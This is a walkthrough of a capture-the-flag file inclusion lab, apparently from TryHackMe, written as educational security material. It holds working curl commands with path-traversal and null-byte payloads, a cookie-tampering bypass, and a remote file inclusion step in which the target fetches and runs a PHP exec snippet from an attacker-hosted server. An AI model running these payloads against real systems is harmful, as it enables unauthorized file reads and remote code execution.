Question 1: Capture Flag1 at /etc/flag1

We move to http://target/challenges/chall1.php


As the screenshot shows, clicking the Include button does not work: the form submits the input to the server with a GET request (visible in the page source via view-source, or in Developer Tools > Network), so we need to send the file parameter in a POST request instead. We can do this with curl:

curl -X POST 'http://target/challenges/chall1.php' -H 'Content-Type: application/x-www-form-urlencoded' -d 'file=../../../../etc/flag1'

Afterwards, we can find the flag in the output: F1x3d-iNpu7-f0rrn

Question 2: Capture Flag2 at /etc/flag2

We move to http://target/challenges/chall2.php


As the screenshot shows, we cannot access the page because we are not Admin. Therefore, we need to find the authentication method and bypass it. To do so, right click anywhere on the page and click Inspect to open Developer Tools.

Since we need the Network tab in Developer Tools, refresh the page once so the request is recorded. Afterwards, click on chall2.php:


and go to the Cookies section:

Now we see that there is a cookie named THM with the value "Guest":


If the authentication goes through cookies, we can manipulate the cookie from Developer Tools. To do so, go to the Storage tab:

Click Cookies > the target IP:

Now double click on "Value":

and change it to Admin, then refresh the page.

We have now bypassed the authorization check; however, there is still no flag.


The warnings tell us that the page runs an include built from the cookie value, roughly include("includes/" . $_COOKIE["THM"] . ".php"). So we set the cookie in Developer Tools > Storage to ../../../../etc/flag2%00 and refresh again to get the flag: c00k13_i5_yuMmy1

We need the %00 (a URL-encoded null byte, which PHP decodes when it reads the cookie) because the code appends .php automatically; the null byte truncates the path before the suffix. As the second warning also shows, the PHP version is 5.2, older than 5.3.4, where null bytes in include paths started being rejected, so the null-byte trick still works here.

Question 3: Capture Flag3 at /etc/flag3

We move to http://target/challenges/chall3.php


Now when we try the filename ../../../../etc/flag3, we look at the warning:

It says include(etcflag.php ...), so "." and "/" are being removed. To check whether the server strips only the "../" sequence (non-recursively) or every "." and "/" character, we try ....//....//....//....//etc/flag3: if only "../" is removed once, each ....// collapses back to ../ and this entry should work.

The error is the same, which confirms that the server deletes every "." and "/" from the input.

Now when we look at the form source with Ctrl+U, we can see that the form sends a GET request. If the server reads the input with $_REQUEST, it accepts the file parameter not only from the URL query string ($_GET) but also from the POST body ($_POST) and, depending on PHP's request_order setting, cookies ($_COOKIE). Since we could not bypass the validation applied to the query parameter, we try sending file in the POST body with curl, keeping the %00 so that the appended .php is cut off:

curl --output - -X POST 'http://target/challenges/chall3.php' -H 'Content-Type: application/x-www-form-urlencoded' --data-binary $'file=../../../etc/flag3%00'

Afterwards, we can find the flag in the output: P0st_1s_w0rk1in9
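The include behaviour seen in challenges 2 and 3 (a prefix and .php suffix around user input, null-byte truncation on old PHP, a character-deleting filter on the GET parameter, and $_REQUEST merging) can be modelled offline. The following Python is an added example, not the lab's source code: the filters (deletion of "." and "/", plus a weaker non-recursive "../" removal for comparison), the includes/ prefix, the .php suffix and the $_REQUEST merge order are assumptions inferred from the warnings above, and the probe strings are constructed inputs.

```python
"""Offline model of the include() paths seen in challenges 2 and 3.

Added example, not the lab's source. The filters, the "includes/" prefix,
the ".php" suffix and the $_REQUEST merge order are assumptions inferred
from the warnings, not verified code.
"""
from urllib.parse import unquote


def php_urldecode(value):
    """PHP URL-decodes $_GET, $_POST and $_COOKIE values, so %00 arrives as a NUL byte."""
    return unquote(value)


def delete_dots_and_slashes(value):
    """Assumed chall3 filter: every '.' and '/' is deleted, so no traversal survives."""
    return "".join(ch for ch in value if ch not in "./")


def strip_dotdotslash_once(value):
    """Weaker filter for comparison: non-recursive str_replace('../', ''). '....//' -> '../'."""
    return value.replace("../", "")


def effective_include_path(user_value, prefix="", suffix="", filter_fn=None, php_pre_534=True):
    """Path PHP would open for include($prefix . filter($value) . $suffix).

    Before PHP 5.3.4 the path reached the C-level open() as a NUL-terminated
    string, so everything after a %00 (including the appended .php) was dropped.
    From 5.3.4 on, a NUL in the path is rejected instead.
    """
    value = php_urldecode(user_value)
    if filter_fn is not None:
        value = filter_fn(value)
    path = prefix + value + suffix
    if "\0" in path:
        if not php_pre_534:
            raise ValueError("include path contains a null byte (rejected since PHP 5.3.4)")
        path = path.split("\0", 1)[0]
    return path


# Candidate filters to compare against the path echoed in the include() warning.
CANDIDATE_FILTERS = {
    "none": None,
    "strip ../ once": strip_dotdotslash_once,
    "delete . and /": delete_dots_and_slashes,
}


def infer_filter(probe, echoed_path, prefix="", suffix=".php"):
    """Names of the candidate filters whose output matches what the warning echoed."""
    return [name for name, fn in CANDIDATE_FILTERS.items()
            if effective_include_path(probe, prefix, suffix, fn) == echoed_path]


def merge_request(get, post, cookie, request_order="GP"):
    """Model $_REQUEST: sources are merged in request_order, later ones overriding.

    The php.ini default request_order is "GP" (GET then POST); "C" adds cookies.
    Assumption for chall3: the filter runs on $_GET['file'] only, but the include
    reads $_REQUEST['file'], so a value sent in the POST body is never filtered.
    """
    sources = {"G": get, "P": post, "C": cookie}
    merged = {}
    for letter in request_order:
        merged.update(sources[letter])
    return merged


if __name__ == "__main__":
    # Challenge 2: THM cookie, include("includes/" . $_COOKIE["THM"] . ".php") on PHP 5.2
    print(effective_include_path("../../../../etc/flag2%00", prefix="includes/", suffix=".php"))

    # Challenge 3: both probes collapse to the same filename under character deletion
    for probe in ("../../../../etc/flag3", "....//....//....//....//etc/flag3"):
        print(probe, "->", effective_include_path(probe, suffix=".php", filter_fn=delete_dots_and_slashes))
    print(infer_filter("../../../../etc/flag3", "etcflag3.php"))

    # Challenge 3 bypass: the filtered GET value is overridden by the unfiltered POST value
    request = merge_request(
        get={"file": delete_dots_and_slashes("../../../../etc/flag3")},
        post={"file": "../../../etc/flag3%00"},
        cookie={},
    )
    print(effective_include_path(request["file"], suffix=".php"))
```

Under the assumed character-deleting filter both ../../../../etc/flag3 and ....//....//....//....//etc/flag3 become etcflag3.php, which is why the second probe told us nothing new; against the weaker non-recursive "../" removal the same ....// probe would have produced ../../../../etc/flag3.php. The infer_filter helper turns that comparison into a check you can run against whatever path the warning echoes.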

Question 4: Gain RCE in Lab #Playground /playground.php with RFI to execute the hostname command. What is the output?

First, we can create a test.php file on our attack machine with the content: <?php echo exec("hostname"); ?>


For RFI, we need to host a web server so the target can fetch our file by URL. We can serve the current directory from a terminal with Python 3: python3 -m http.server 8000

Now, http://attackmachineIP:8000/test.php will be accessible by target server.

Go to file inclusion lab now and submit http://attackmachineIP:8000/test.php:


Now we see the flag in the output: lfi-vm-thm-f8c5b1a78692